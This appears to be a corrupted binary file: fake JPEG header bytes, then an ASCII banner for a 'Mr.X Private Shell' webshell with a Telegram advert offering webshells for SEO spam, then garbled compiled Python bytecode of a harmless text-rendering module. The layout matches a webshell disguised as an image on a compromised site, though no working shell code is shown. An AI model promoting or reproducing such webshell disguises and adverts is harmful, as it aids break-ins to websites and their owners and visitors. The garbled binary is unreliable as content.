����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
a
"e � @ s@ d dl mZ d dl mZ ddlmZ d dlZG dd� de�ZdS )� )�print_function)�unicode_literals� )�ViewNc @ s( e Zd ZdZdd� Zdd� Zdd� ZdS ) �
BlocksViewzh
Assign ``blocks`` with this list
[
{
"title": "...",
"content": "some text",
},
...
]
c C s^ t | jj�D ]L\}}|d rd|v r2| �|d � | j|d dd� | �|�r| �d� qd S )N�content�title� )�end)� enumerate�args�blocks�print�next��self�index�block� r �7/usr/lib/python3.9/site-packages/tracer/views/blocks.py�render s
zBlocksView.renderc C s, | j j|d d� D ]}|d r dS qdS )z<Return True if there is any nonempty block after given indexr Nr TF)r r
r r r r r s zBlocksView.nextc C s<